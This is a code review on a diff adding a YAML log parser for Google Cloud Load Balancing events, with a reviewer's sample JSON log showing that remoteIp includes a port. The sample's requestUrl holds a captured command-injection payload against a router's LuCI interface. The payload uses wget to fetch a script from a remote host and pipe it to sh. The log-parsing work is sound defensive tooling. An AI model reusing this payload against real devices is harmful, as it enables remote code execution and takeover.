Google Cloud/Google Cloud Load Balancing/ingest/parser.yml

```diff
@@ -0,0 +1,42 @@
+name: google-cloud-load-balancing
+pipeline:
+  - name: parsed_event
+    external:
+      name: json.parse-json
+
+  - name: set_ecs_fields
+
+stages:
+  set_ecs_fields:
+    actions:
+      - set:
+          cloud.provider: "Google Cloud"
+          cloud.service.name: "Load Balancing"
+
+          event.category: ["web"]
+          event.type: ["access"]
+
+      - set:
+          "@timestamp": "{{parsed_event.message.timestamp | to_rfc3339}}"
+          cloud.project.id: "{{parsed_event.message.resource.labels.project_id}}"
+          cloud.region: "{{parsed_event.message.resource.labels.zone}}"
+          source.ip: "{{parsed_event.message.httpRequest.remoteIp}}"
```

Comment:
So, according to some events we collected, `remoteIp` can provide the source port also.
Example:
```json
{
  "httpRequest": {
    "latency": "0.001115s",
    "protocol": "HTTP/1.1",
    "remoteIp": "1.2.3.4:49194",
    "requestMethod": "GET",
    "requestSize": "201",
    "requestUrl": "http://5.6.7.8:80/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F1.1.1.1%3A88%2Ft%7Csh%3B%60)",
    "responseSize": "155",
    "status": 503,
    "userAgent": "Go-http-client/1.1"
  },
  "insertId": "1t7m3mbf14kc7c",
  "jsonPayload": {
    "@type": "type.googleapis.com/google.cloud.loadbalancing.type.LoadBalancerLogEntry",
    "backendTargetProjectNumber": "projects/111111111111",
    "enforcedSecurityPolicy": {
      "configuredAction": "THROTTLE",
      "name": "policy-name",
      "outcome": "ACCEPT",
      "priority": 2147483646,
      "rateLimitAction": {
        "key": "1.2.3.4",
        "outcome": "RATE_LIMIT_THRESHOLD_CONFORM"
      }
    },
    "proxyStatus": "error=\"destination_unavailable\"; details=\"failed_to_pick_backend\""
  },
  "logName": "projects/integration-gcloadbalancing/logs/loadbalancing.googleapis.com%2Fexternal_regional_requests",
  "receiveTimestamp": "2024-08-26T15:30:31.15568806Z",
  "resource": {
    "labels": {
      "backend_name": "",
      "backend_scope": "UNKNOWN",
      "backend_scope_type": "UNKNOWN",
      "backend_target_name": "backend-name",
      "backend_target_type": "BACKEND_SERVICE",
      "backend_type": "UNKNOWN",
      "forwarding_rule_name": "forwarding_rule-name",
      "matched_url_path_rule": "UNMATCHED",
      "network_name": "default",
      "project_id": "integration-gcloadbalancing",
      "region": "europe-west9",
      "target_proxy_name": "proxy-name",
      "url_map_name": "url_map-name"
    },
    "type": "http_external_regional_lb_rule"
  },
  "severity": "WARNING",
  "timestamp": "2024-08-26T15:30:27.62577Z"
}
```